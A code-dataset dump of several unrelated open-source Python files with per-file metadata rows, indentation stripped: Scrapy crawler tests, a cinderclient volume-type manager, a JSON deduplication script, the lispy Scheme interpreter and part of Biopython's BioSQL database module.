self.assertIn("CrawlerRunner.spider_loader", str(w[0].message))
sl_cls = load_object(runner.settings['SPIDER_LOADER_CLASS'])
self.assertIsInstance(spiders, sl_cls)
class CrawlerProcessTest(BaseCrawlerTest):
def test_crawler_process_accepts_dict(self):
runner = CrawlerProcess({'foo': 'bar'})
self.assertEqual(runner.settings['foo'], 'bar')
self.assertOptionIsDefault(runner.settings, 'RETRY_ENABLED')
def test_crawler_process_accepts_None(self):
runner = CrawlerProcess()
self.assertOptionIsDefault(runner.settings, 'RETRY_ENABLED')
class ExceptionSpider(scrapy.Spider):
name = 'exception'
@classmethod
def from_crawler(cls, crawler, *args, **kwargs):
raise ValueError('Exception in from_crawler method')
class NoRequestsSpider(scrapy.Spider):
name = 'no_request'
def start_requests(self):
return []
@mark.usefixtures('reactor_pytest')
class CrawlerRunnerHasSpider(unittest.TestCase):
@defer.inlineCallbacks
def test_crawler_runner_bootstrap_successful(self):
runner = CrawlerRunner()
yield runner.crawl(NoRequestsSpider)
self.assertEqual(runner.bootstrap_failed, False)
@defer.inlineCallbacks
def test_crawler_runner_bootstrap_successful_for_several(self):
runner = CrawlerRunner()
yield runner.crawl(NoRequestsSpider)
yield runner.crawl(NoRequestsSpider)
self.assertEqual(runner.bootstrap_failed, False)
@defer.inlineCallbacks
def test_crawler_runner_bootstrap_failed(self):
runner = CrawlerRunner()
try:
yield runner.crawl(ExceptionSpider)
except ValueError:
pass
else:
self.fail('Exception should be raised from spider')
self.assertEqual(runner.bootstrap_failed, True)
@defer.inlineCallbacks
def test_crawler_runner_bootstrap_failed_for_several(self):
runner = CrawlerRunner()
try:
yield runner.crawl(ExceptionSpider)
except ValueError:
pass
else:
self.fail('Exception should be raised from spider')
yield runner.crawl(NoRequestsSpider)
self.assertEqual(runner.bootstrap_failed, True)
def test_crawler_runner_asyncio_enabled_true(self):
if self.reactor_pytest == 'asyncio':
CrawlerRunner(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
else:
msg = r"The installed reactor \(.*?\) does not match the requested one \(.*?\)"
with self.assertRaisesRegex(Exception, msg):
CrawlerRunner(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
@defer.inlineCallbacks
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_crawler_process_asyncio_enabled_true(self):
with LogCapture(level=logging.DEBUG) as log:
if self.reactor_pytest == 'asyncio':
runner = CrawlerProcess(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
yield runner.crawl(NoRequestsSpider)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", str(log))
else:
msg = r"The installed reactor \(.*?\) does not match the requested one \(.*?\)"
with self.assertRaisesRegex(Exception, msg):
runner = CrawlerProcess(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
@defer.inlineCallbacks
def test_crawler_process_asyncio_enabled_false(self):
runner = CrawlerProcess(settings={"TWISTED_REACTOR": None})
with LogCapture(level=logging.DEBUG) as log:
yield runner.crawl(NoRequestsSpider)
self.assertNotIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", str(log))
class ScriptRunnerMixin:
def run_script(self, script_name, *script_args):
script_path = os.path.join(self.script_dir, script_name)
args = [sys.executable, script_path] + list(script_args)
p = subprocess.Popen(args, env=get_testenv(),
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return stderr.decode('utf-8')
class CrawlerProcessSubprocess(ScriptRunnerMixin, unittest.TestCase):
script_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'CrawlerProcess')
def test_simple(self):
log = self.run_script('simple.py')
self.assertIn('Spider closed (finished)', log)
self.assertNotIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_asyncio_enabled_no_reactor(self):
log = self.run_script('asyncio_enabled_no_reactor.py')
self.assertIn('Spider closed (finished)', log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_asyncio_enabled_reactor(self):
log = self.run_script('asyncio_enabled_reactor.py')
self.assertIn('Spider closed (finished)', log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
def test_ipv6_default_name_resolver(self):
log = self.run_script('default_name_resolver.py')
self.assertIn('Spider closed (finished)', log)
self.assertIn("'downloader/exception_type_count/twisted.internet.error.DNSLookupError': 1,", log)
self.assertIn(
"twisted.internet.error.DNSLookupError: DNS lookup failed: no results for hostname lookup: ::1.",
log)
def test_caching_hostname_resolver_ipv6(self):
log = self.run_script("caching_hostname_resolver_ipv6.py")
self.assertIn("Spider closed (finished)", log)
self.assertNotIn("twisted.internet.error.DNSLookupError", log)
def test_caching_hostname_resolver_finite_execution(self):
with MockServer() as mock_server:
http_address = mock_server.http_address.replace("0.0.0.0", "127.0.0.1")
log = self.run_script("caching_hostname_resolver.py", http_address)
self.assertIn("Spider closed (finished)", log)
self.assertNotIn("ERROR: Error downloading", log)
self.assertNotIn("TimeoutError", log)
self.assertNotIn("twisted.internet.error.DNSLookupError", log)
def test_reactor_select(self):
log = self.run_script("twisted_reactor_select.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.selectreactor.SelectReactor", log)
@mark.skipif(platform.system() == 'Windows', reason="PollReactor is not supported on Windows")
def test_reactor_poll(self):
log = self.run_script("twisted_reactor_poll.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.pollreactor.PollReactor", log)
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_reactor_asyncio(self):
log = self.run_script("twisted_reactor_asyncio.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
@mark.skipif(sys.implementation.name == 'pypy', reason='uvloop does not support pypy properly')
@mark.skipif(platform.system() == 'Windows', reason='uvloop does not support Windows')
def test_custom_loop_asyncio(self):
log = self.run_script("asyncio_custom_loop.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
self.assertIn("Using asyncio event loop: uvloop.Loop", log)
@mark.skipif(sys.implementation.name == "pypy", reason="uvloop does not support pypy properly")
@mark.skipif(platform.system() == "Windows", reason="uvloop does not support Windows")
def test_custom_loop_asyncio_deferred_signal(self):
log = self.run_script("asyncio_deferred_signal.py", "uvloop.Loop")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
self.assertIn("Using asyncio event loop: uvloop.Loop", log)
self.assertIn("async pipeline opened!", log)
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_default_loop_asyncio_deferred_signal(self):
log = self.run_script("asyncio_deferred_signal.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
self.assertNotIn("Using asyncio event loop: uvloop.Loop", log)
self.assertIn("async pipeline opened!", log)
class CrawlerRunnerSubprocess(ScriptRunnerMixin, unittest.TestCase):
script_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'CrawlerRunner')
def test_response_ip_address(self):
log = self.run_script("ip_address.py")
self.assertIn("INFO: Spider closed (finished)", log)
self.assertIn("INFO: Host: not.a.real.domain", log)
self.assertIn("INFO: Type: <class 'ipaddress.IPv4Address'>", log)
self.assertIn("INFO: IP address: 127.0.0.1", log)
|
bsd-3-clause
| 6,069,620,214,822,966,000 | 40.463291 | 112 | 0.666992 | false | 4.025068 | true | false | false |
metacloud/python-cinderclient
|
cinderclient/v1/volume_types.py
|
1
|
3496
|
# Copyright (c) 2011 Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Volume Type interface.
"""
from cinderclient import base
class VolumeType(base.Resource):
"""
A Volume Type is the type of volume to be created
"""
def __repr__(self):
return "<VolumeType: %s>" % self.name
def get_keys(self):
"""
Get extra specs from a volume type.
:param vol_type: The :class:`VolumeType` to get extra specs from
"""
_resp, body = self.manager.api.client.get(
"/types/%s/extra_specs" %
base.getid(self))
return body["extra_specs"]
def set_keys(self, metadata):
"""
Set extra specs on a volume type.
:param type : The :class:`VolumeType` to set extra spec on
:param metadata: A dict of key/value pairs to be set
"""
body = {'extra_specs': metadata}
return self.manager._create(
"/types/%s/extra_specs" % base.getid(self),
body,
"extra_specs",
return_raw=True)
def unset_keys(self, keys):
"""
Unset extra specs on a volume type.
:param type_id: The :class:`VolumeType` to unset extra spec on
:param keys: A list of keys to be unset
"""
# NOTE(jdg): This wasn't actually doing all of the keys before
# the return in the loop resulted in only ONE key being unset.
# since on success the return was NONE, we'll only interrupt the loop
# and return if there's an error
resp = None
for k in keys:
resp = self.manager._delete(
"/types/%s/extra_specs/%s" % (
base.getid(self), k))
if resp is not None:
return resp
class VolumeTypeManager(base.ManagerWithFind):
"""
Manage :class:`VolumeType` resources.
"""
resource_class = VolumeType
def list(self, search_opts=None):
"""
Get a list of all volume types.
:rtype: list of :class:`VolumeType`.
"""
return self._list("/types", "volume_types")
def get(self, volume_type):
"""
Get a specific volume type.
:param volume_type: The ID of the :class:`VolumeType` to get.
:rtype: :class:`VolumeType`
"""
return self._get("/types/%s" % base.getid(volume_type), "volume_type")
def delete(self, volume_type):
"""
Delete a specific volume_type.
:param volume_type: The name or ID of the :class:`VolumeType` to get.
"""
self._delete("/types/%s" % base.getid(volume_type))
def create(self, name):
"""
Create a volume type.
:param name: Descriptive name of the volume type
:rtype: :class:`VolumeType`
"""
body = {
"volume_type": {
"name": name,
}
}
return self._create("/types", body, "volume_type")
|
apache-2.0
| -7,710,020,607,655,474,000 | 27.655738 | 78 | 0.578661 | false | 4.041618 | false | false | false |
mefly2012/platform
|
test/guozibeijing/deal_repeat.py
|
1
|
1867
|
# coding=utf-8
import json
import codecs
import os
import sys
import re
if __name__ == '__main__':
fr1 = codecs.open(sys.argv[1], 'r', encoding='utf-8') # the file tallied by me
fr2 = codecs.open(sys.argv[2], 'r', encoding='utf-8') # the file tallied by Jun (君哥)
dics1 = []
dics2 = []
for i in fr1:
js = json.loads(i)
js["bbd_dotime"] = js.get("bbd_dotime").replace(u'年', '-').replace(u'月', '-').replace(u'日', '')
dics1.append(js)
for i in fr2:
js = json.loads(i)
match = re.compile(u'^(\d+).(\d+).(\d+)$').match(js["bbd_dotime"])
js["bbd_dotime"] = "%4d-%2d-%2d" % (int(match.group(1)), int(match.group(2)), int(match.group(3)))
dics2.append(js)
dics1.sort(key=lambda x: x['company_name'])
dics2.sort(key=lambda x: x['company_name'])
# sorted(dics1, key=lambda x: x['company_name'])
# sorted(dics2, key=lambda x: x['company_name'])
first = True
company = ''
myout = []
current = []
dics1.append({})
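# Note (added for clarity): the empty dict appended above acts as a sentinel so the
# final company group is flushed on the last iteration of the loop below.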
for dc in dics1:
if company != dc.get('company_name', ''):
# pick the record with the largest time
if first:
first = False
company = dc.get('company_name', '')
current.append(dc)
continue
company = dc.get('company_name', '')
max_dc = max(current, key=lambda x: x['bbd_uptime'])
myout.append(max_dc)
current = []
current.append(dc)
pass
else:
current.append(dc)
print len(myout)
# for i in myout:
# find = False
# for j in dics2:
# if i == j:
# find = True
# if find:
# print json.dumps(i, ensure_ascii=False)
for i in myout:
if i not in dics2:
print json.dumps(i, ensure_ascii=False)
|
apache-2.0
| 2,724,095,015,985,590,300 | 25.536232 | 106 | 0.495358 | false | 3.056761 | false | false | false |
klose911/klose911.github.io
|
src/python/src/lisp/lispy.py
|
1
|
12433
|
################ Scheme Interpreter in Python
## (c) Peter Norvig, 2010; See http://norvig.com/lispy2.html
################ Symbol, Procedure, classes
from __future__ import division
from __future__ import print_function
import re, sys
from io import StringIO
class Symbol(str): pass
def Sym(s, symbol_table={}):
"Find or create unique Symbol entry for str s in symbol table."
if s not in symbol_table: symbol_table[s] = Symbol(s)
return symbol_table[s]
_quote, _if, _set, _define, _lambda, _begin, _definemacro, = map(Sym,
"quote if set! define lambda begin define-macro".split())
_quasiquote, _unquote, _unquotesplicing = map(Sym,
"quasiquote unquote unquote-splicing".split())
class Procedure(object):
"A user-defined Scheme procedure."
def __init__(self, parms, exp, env):
self.parms, self.exp, self.env = parms, exp, env
def __call__(self, *args):
return eval(self.exp, Env(self.parms, args, self.env))
################ parse, read, and user interaction
def parse(inport):
"Parse a program: read and expand/error-check it."
# Backwards compatibility: given a str, convert it to an InPort
if isinstance(inport, str): inport = InPort(StringIO(inport))
return expand(read(inport), toplevel=True)
eof_object = Symbol('#<eof-object>') # Note: uninterned; can't be read
class InPort(object):
"An input port. Retains a line of chars."
tokenizer = r"""\s*(,@|[('`,)]|"(?:[\\].|[^\\"])*"|;.*|[^\s('"`,;)]*)(.*)"""
def __init__(self, file):
self.file = file; self.line = ''
def next_token(self):
"Return the next token, reading new text into line buffer if needed."
while True:
if self.line == '': self.line = self.file.readline()
if self.line == '': return eof_object
token, self.line = re.match(InPort.tokenizer, self.line).groups()
if token != '' and not token.startswith(';'):
return token
def readchar(inport):
"Read the next character from an input port."
if inport.line != '':
ch, inport.line = inport.line[0], inport.line[1:]
return ch
else:
return inport.file.read(1) or eof_object
def read(inport):
"Read a Scheme expression from an input port."
def read_ahead(token):
if '(' == token:
L = []
while True:
token = inport.next_token()
if token == ')': return L
else: L.append(read_ahead(token))
elif ')' == token: raise SyntaxError('unexpected )')
elif token in quotes: return [quotes[token], read(inport)]
elif token is eof_object: raise SyntaxError('unexpected EOF in list')
else: return atom(token)
# body of read:
token1 = inport.next_token()
return eof_object if token1 is eof_object else read_ahead(token1)
quotes = {"'":_quote, "`":_quasiquote, ",":_unquote, ",@":_unquotesplicing}
def atom(token):
'Numbers become numbers; #t and #f are booleans; "..." string; otherwise Symbol.'
if token == '#t': return True
elif token == '#f': return False
elif token[0] == '"': return token[1:-1].decode('string_escape')
try: return int(token)
except ValueError:
try: return float(token)
except ValueError:
try: return complex(token.replace('i', 'j', 1))
except ValueError:
return Sym(token)
def to_string(x):
"Convert a Python object back into a Lisp-readable string."
if x is True: return "#t"
elif x is False: return "#f"
elif isa(x, Symbol): return x
elif isa(x, str): return '"%s"' % x.encode('string_escape').replace('"',r'\"')
elif isa(x, list): return '('+' '.join(map(to_string, x))+')'
elif isa(x, complex): return str(x).replace('j', 'i')
else: return str(x)
def load(filename):
"Eval every expression from a file."
repl(None, InPort(open(filename)), None)
def repl(prompt='lispy> ', inport=InPort(sys.stdin), out=sys.stdout):
"A prompt-read-eval-print loop."
sys.stderr.write("Lispy version 2.0\n")
while True:
try:
if prompt: sys.stderr.write(prompt)
x = parse(inport)
if x is eof_object: return
val = eval(x)
if val is not None and out: print(to_string(val), file=out)
except Exception as e:
print('%s: %s' % (type(e).__name__, e))
################ Environment class
class Env(dict):
"An environment: a dict of {'var':val} pairs, with an outer Env."
def __init__(self, parms=(), args=(), outer=None):
# Bind parm list to corresponding args, or single parm to list of args
self.outer = outer
if isa(parms, Symbol):
self.update({parms:list(args)})
else:
if len(args) != len(parms):
raise TypeError('expected %s, given %s, '
% (to_string(parms), to_string(args)))
self.update(zip(parms,args))
def find(self, var):
"Find the innermost Env where var appears."
if var in self: return self
elif self.outer is None: raise LookupError(var)
else: return self.outer.find(var)
def is_pair(x): return x != [] and isa(x, list)
def cons(x, y): return [x]+y
def callcc(proc):
"Call proc with current continuation; escape only"
ball = RuntimeWarning("Sorry, can't continue this continuation any longer.")
def throw(retval): ball.retval = retval; raise ball
try:
return proc(throw)
except RuntimeWarning as w:
if w is ball: return ball.retval
else: raise w
def add_globals(self):
"Add some Scheme standard procedures."
import math, cmath, operator as op
self.update(vars(math))
self.update(vars(cmath))
self.update({
'+':op.add, '-':op.sub, '*':op.mul, '/':op.truediv, 'not':op.not_,
'>':op.gt, '<':op.lt, '>=':op.ge, '<=':op.le, '=':op.eq,
'equal?':op.eq, 'eq?':op.is_, 'length':len, 'cons':cons,
'car':lambda x:x[0], 'cdr':lambda x:x[1:], 'append':op.add,
'list':lambda *x:list(x), 'list?': lambda x:isa(x,list),
'null?':lambda x:x==[], 'symbol?':lambda x: isa(x, Symbol),
'boolean?':lambda x: isa(x, bool), 'pair?':is_pair,
'port?': lambda x:isa(x,file), 'apply':lambda proc,l: proc(*l),
'eval':lambda x: eval(expand(x)), 'load':lambda fn: load(fn), 'call/cc':callcc,
'open-input-file':open,'close-input-port':lambda p: p.file.close(),
'open-output-file':lambda f:open(f,'w'), 'close-output-port':lambda p: p.close(),
'eof-object?':lambda x:x is eof_object, 'read-char':readchar,
'read':read, 'write':lambda x,port=sys.stdout:port.write(to_string(x)),
'display':lambda x,port=sys.stdout:port.write(x if isa(x,str) else to_string(x))})
return self
isa = isinstance
global_env = add_globals(Env())
################ eval (tail recursive)
def eval(x, env=global_env):
"Evaluate an expression in an environment."
while True:
if isa(x, Symbol): # variable reference
return env.find(x)[x]
elif not isa(x, list): # constant literal
return x
elif x[0] is _quote: # (quote exp)
(_, exp) = x
return exp
elif x[0] is _if: # (if test conseq alt)
(_, test, conseq, alt) = x
x = (conseq if eval(test, env) else alt)
elif x[0] is _set: # (set! var exp)
(_, var, exp) = x
env.find(var)[var] = eval(exp, env)
return None
elif x[0] is _define: # (define var exp)
(_, var, exp) = x
env[var] = eval(exp, env)
return None
elif x[0] is _lambda: # (lambda (var*) exp)
(_, vars, exp) = x
return Procedure(vars, exp, env)
elif x[0] is _begin: # (begin exp+)
for exp in x[1:-1]:
eval(exp, env)
x = x[-1]
else: # (proc exp*)
exps = [eval(exp, env) for exp in x]
proc = exps.pop(0)
if isa(proc, Procedure):
x = proc.exp
env = Env(proc.parms, exps, proc.env)
else:
return proc(*exps)
################ expand
def expand(x, toplevel=False):
"Walk tree of x, making optimizations/fixes, and signaling SyntaxError."
require(x, x!=[]) # () => Error
if not isa(x, list): # constant => unchanged
return x
elif x[0] is _quote: # (quote exp)
require(x, len(x)==2)
return x
elif x[0] is _if:
if len(x)==3: x = x + [None] # (if t c) => (if t c None)
require(x, len(x)==4)
return [expand(xi) for xi in x]
elif x[0] is _set:
require(x, len(x)==3);
var = x[1] # (set! non-var exp) => Error
require(x, isa(var, Symbol), "can set! only a symbol")
return [_set, var, expand(x[2])]
elif x[0] is _define or x[0] is _definemacro:
require(x, len(x)>=3)
_def, v, body = x[0], x[1], x[2:]
if isa(v, list) and v: # (define (f args) body)
f, args = v[0], v[1:] # => (define f (lambda (args) body))
return expand([_def, f, [_lambda, args]+body])
else:
require(x, len(x)==3) # (define non-var/list exp) => Error
require(x, isa(v, Symbol), "can define only a symbol")
exp = expand(x[2])
if _def is _definemacro:
require(x, toplevel, "define-macro only allowed at top level")
proc = eval(exp)
require(x, callable(proc), "macro must be a procedure")
macro_table[v] = proc # (define-macro v proc)
return None # => None; add v:proc to macro_table
return [_define, v, exp]
elif x[0] is _begin:
if len(x)==1: return None # (begin) => None
else: return [expand(xi, toplevel) for xi in x]
elif x[0] is _lambda: # (lambda (x) e1 e2)
require(x, len(x)>=3) # => (lambda (x) (begin e1 e2))
vars, body = x[1], x[2:]
require(x, (isa(vars, list) and all(isa(v, Symbol) for v in vars))
or isa(vars, Symbol), "illegal lambda argument list")
exp = body[0] if len(body) == 1 else [_begin] + body
return [_lambda, vars, expand(exp)]
elif x[0] is _quasiquote: # `x => expand_quasiquote(x)
require(x, len(x)==2)
return expand_quasiquote(x[1])
elif isa(x[0], Symbol) and x[0] in macro_table:
return expand(macro_table[x[0]](*x[1:]), toplevel) # (m arg...)
else: # => macroexpand if m isa macro
return [expand(xi) for xi in x] # (f arg...) => expand each
def require(x, predicate, msg="wrong length"):
"Signal a syntax error if predicate is false."
if not predicate: raise SyntaxError(to_string(x)+': '+msg)
_append, _cons, _let = map(Sym, "append cons let".split())
def expand_quasiquote(x):
"""Expand `x => 'x; `,x => x; `(,@x y) => (append x y) """
if not is_pair(x):
return [_quote, x]
require(x, x[0] is not _unquotesplicing, "can't splice here")
if x[0] is _unquote:
require(x, len(x)==2)
return x[1]
elif is_pair(x[0]) and x[0][0] is _unquotesplicing:
require(x[0], len(x[0])==2)
return [_append, x[0][1], expand_quasiquote(x[1:])]
else:
return [_cons, expand_quasiquote(x[0]), expand_quasiquote(x[1:])]
def let(*args):
args = list(args)
x = cons(_let, args)
require(x, len(args)>1)
bindings, body = args[0], args[1:]
require(x, all(isa(b, list) and len(b)==2 and isa(b[0], Symbol)
for b in bindings), "illegal binding list")
vars, vals = zip(*bindings)
return [[_lambda, list(vars)] + [expand(e) for e in body]] + [expand(v) for v in vals]
macro_table = {_let:let} ## More macros can go here
eval(parse("""(begin
(define-macro and (lambda args
(if (null? args) #t
(if (= (length args) 1) (car args)
`(if ,(car args) (and ,@(cdr args)) #f)))))
;; More macros can also go here
)"""))
if __name__ == '__main__':
repl()
|
apache-2.0
| 21,476,832,186,802,524 | 37.974922 | 87 | 0.541945 | false | 3.343103 | false | false | false |
poojavade/Genomics_Docker
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/BioSQL/BioSeqDatabase.py
|
1
|
30416
|
# Copyright 2002 by Andrew Dalke. All rights reserved.
# Revisions 2007-2014 copyright by Peter Cock. All rights reserved.
# Revisions 2009 copyright by Cymon J. Cox. All rights reserved.
# Revisions 2013-2014 copyright by Tiago Antao. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
# Note that BioSQL (including the database schema and scripts) is
# available and licensed separately. Please consult www.biosql.org
"""Connect with a BioSQL database and load Biopython like objects from it.
This provides interfaces for loading biological objects from a relational
database, and is compatible with the BioSQL standards.
"""
import os
import sys
from Bio._py3k import _universal_read_mode
from Bio._py3k import _bytes_bytearray_to_str as bytearray_to_str
from Bio import BiopythonDeprecationWarning
from . import BioSeq
from . import Loader
from . import DBUtils
_POSTGRES_RULES_PRESENT = False # Hack for BioSQL Bug 2839
def open_database(driver="MySQLdb", **kwargs):
"""Main interface for loading a existing BioSQL-style database.
This function is the easiest way to retrieve a connection to a
database, doing something like:
>>> from BioSQL import BioSeqDatabase
>>> server = BioSeqDatabase.open_database(user="root", db="minidb")
Arguments:
- driver - The name of the database driver to use for connecting. The
driver should implement the python DB API. By default, the MySQLdb
driver is used.
- user -the username to connect to the database with.
- password, passwd - the password to connect with
- host - the hostname of the database
- database or db - the name of the database
"""
if driver == "psycopg":
raise ValueError("Using BioSQL with psycopg (version one) is no "
"longer supported. Use psycopg2 instead.")
if os.name == "java":
from com.ziclix.python.sql import zxJDBC
module = zxJDBC
if driver in ["MySQLdb"]:
jdbc_driver = "com.mysql.jdbc.Driver"
url_pref = "jdbc:mysql://" + kwargs["host"] + "/"
elif driver in ["psycopg2"]:
jdbc_driver = "org.postgresql.Driver"
url_pref = "jdbc:postgresql://" + kwargs["host"] + "/"
else:
module = __import__(driver, fromlist=["connect"])
connect = module.connect
# Different drivers use different keywords...
kw = kwargs.copy()
if driver in ["MySQLdb", "mysql.connector"] and os.name != "java":
if "database" in kw:
kw["db"] = kw["database"]
del kw["database"]
if "password" in kw:
kw["passwd"] = kw["password"]
del kw["password"]
# kw["charset"] = "utf8"
# kw["use_unicode"] = True
else:
# DB-API recommendations
if "db" in kw:
kw["database"] = kw["db"]
del kw["db"]
if "passwd" in kw:
kw["password"] = kw["passwd"]
del kw["passwd"]
if driver in ["psycopg2", "pgdb"] and not kw.get("database"):
kw["database"] = "template1"
# SQLite connect takes the database name as input
if os.name == "java":
if driver in ["MySQLdb"]:
conn = connect(url_pref + kw.get("database", "mysql"),
kw["user"], kw["password"], jdbc_driver)
elif driver in ["psycopg2"]:
conn = connect(url_pref + kw.get("database", "postgresql") +
"?stringtype=unspecified",
kw["user"], kw["password"], jdbc_driver)
elif driver in ["sqlite3"]:
conn = connect(kw["database"])
else:
conn = connect(**kw)
if os.name == "java":
server = DBServer(conn, module, driver)
else:
server = DBServer(conn, module)
# TODO - Remove the following once BioSQL Bug 2839 is fixed.
# Test for RULES in PostgreSQL schema, see also Bug 2833.
if driver in ["psycopg2", "pgdb"]:
sql = "SELECT ev_class FROM pg_rewrite WHERE " + \
"rulename='rule_bioentry_i1' OR " + \
"rulename='rule_bioentry_i2';"
if server.adaptor.execute_and_fetchall(sql):
import warnings
from Bio import BiopythonWarning
warnings.warn("Your BioSQL PostgreSQL schema includes some "
"rules currently required for bioperl-db but "
"which may cause problems loading data using "
"Biopython (see BioSQL Bug 2839). If you do not "
"use BioPerl, please remove these rules. "
"Biopython should cope with the rules present, "
"but with a performance penalty when loading "
"new records.", BiopythonWarning)
global _POSTGRES_RULES_PRESENT
_POSTGRES_RULES_PRESENT = True
return server
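# Hedged usage sketch (not part of BioSQL itself): opening a server with the
# standard library sqlite3 driver. The file name is a placeholder and the BioSQL
# schema is assumed to have been loaded already.
def _example_open_sqlite_server():
    server = open_database(driver="sqlite3", database="biosql.sqlite")
    try:
        return list(server.keys())   # namespace names in the database
    finally:
        server.close()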
class DBServer(object):
"""Represents a BioSQL database continaing namespaces (sub-databases).
This acts like a Python dictionary, giving access to each namespace
(defined by a row in the biodatabase table) as a BioSeqDatabase object.
"""
def __init__(self, conn, module, module_name=None):
self.module = module
if module_name is None:
module_name = module.__name__
if module_name == "mysql.connector" and sys.version_info[0] == 3:
wrap_cursor = True
else:
wrap_cursor = False
# Get module specific Adaptor or the base (general) Adaptor
Adapt = _interface_specific_adaptors.get(module_name, Adaptor)
self.adaptor = Adapt(conn, DBUtils.get_dbutils(module_name),
wrap_cursor=wrap_cursor)
self.module_name = module_name
def __repr__(self):
return self.__class__.__name__ + "(%r)" % self.adaptor.conn
def __getitem__(self, name):
return BioSeqDatabase(self.adaptor, name)
def __len__(self):
"""Number of namespaces (sub-databases) in this database."""
sql = "SELECT COUNT(name) FROM biodatabase;"
return int(self.adaptor.execute_and_fetch_col0(sql)[0])
def __contains__(self, value):
"""Check if a namespace (sub-database) in this database."""
sql = "SELECT COUNT(name) FROM biodatabase WHERE name=%s;"
return bool(self.adaptor.execute_and_fetch_col0(sql, (value,))[0])
def __iter__(self):
"""Iterate over namespaces (sub-databases) in the database."""
# TODO - Iterate over the cursor, much more efficient
return iter(self.adaptor.list_biodatabase_names())
if hasattr(dict, "iteritems"):
# Python 2, use iteritems etc
def keys(self):
"""List of namespaces (sub-databases) in the database."""
return self.adaptor.list_biodatabase_names()
def values(self):
"""List of BioSeqDatabase objects in the database."""
return [self[key] for key in self]
def items(self):
"""List of (namespace, BioSeqDatabase) for entries in the database."""
return [(key, self[key]) for key in self]
def iterkeys(self):
"""Iterate over namespaces (sub-databases) in the database."""
return iter(self)
def itervalues(self):
"""Iterate over BioSeqDatabase objects in the database."""
for key in self:
yield self[key]
def iteritems(self):
"""Iterate over (namespace, BioSeqDatabase) in the database."""
for key in self:
yield key, self[key]
else:
# Python 3, items etc are all iterators
def keys(self):
"""Iterate over namespaces (sub-databases) in the database."""
return iter(self)
def values(self):
"""Iterate over BioSeqDatabase objects in the database."""
for key in self:
yield self[key]
def items(self):
"""Iterate over (namespace, BioSeqDatabase) in the database."""
for key in self:
yield key, self[key]
def __delitem__(self, name):
"""Remove a namespace and all its entries."""
if name not in self:
raise KeyError(name)
db_id = self.adaptor.fetch_dbid_by_dbname(name)
remover = Loader.DatabaseRemover(self.adaptor, db_id)
remover.remove()
def remove_database(self, db_name):
"""Remove a namespace and all its entries (OBSOLETE).
Try to remove all references to items in a database.
server.remove_database(name)
In keeping with the dictionary interface, you can now do this:
del server[name]
"""
import warnings
warnings.warn("This method is deprecated. In keeping with the "
"dictionary interface, you can now use 'del "
"server[name]' instead", BiopythonDeprecationWarning)
self.__delitem__(db_name)
def new_database(self, db_name, authority=None, description=None):
"""Add a new database to the server and return it.
"""
# make the database
sql = r"INSERT INTO biodatabase (name, authority, description)" \
r" VALUES (%s, %s, %s)"
self.adaptor.execute(sql, (db_name, authority, description))
return BioSeqDatabase(self.adaptor, db_name)
def load_database_sql(self, sql_file):
"""Load a database schema into the given database.
This is used to create tables, etc when a database is first created.
sql_file should specify the complete path to a file containing
SQL entries for building the tables.
"""
# Not sophisticated enough for PG schema. Is it needed by MySQL?
# Looks like we need this more complicated way for both. Leaving it
# the default and removing the simple-minded approach.
# read the file with all comment lines removed
sql = ""
with open(sql_file, _universal_read_mode) as sql_handle:
for line in sql_handle:
if line.startswith("--"): # don't include comment lines
pass
elif line.startswith("#"): # ditto for MySQL comments
pass
elif line.strip(): # only include non-blank lines
sql += line.strip() + " "
# two ways to load the SQL
# 1. PostgreSQL can load it all at once and actually needs to
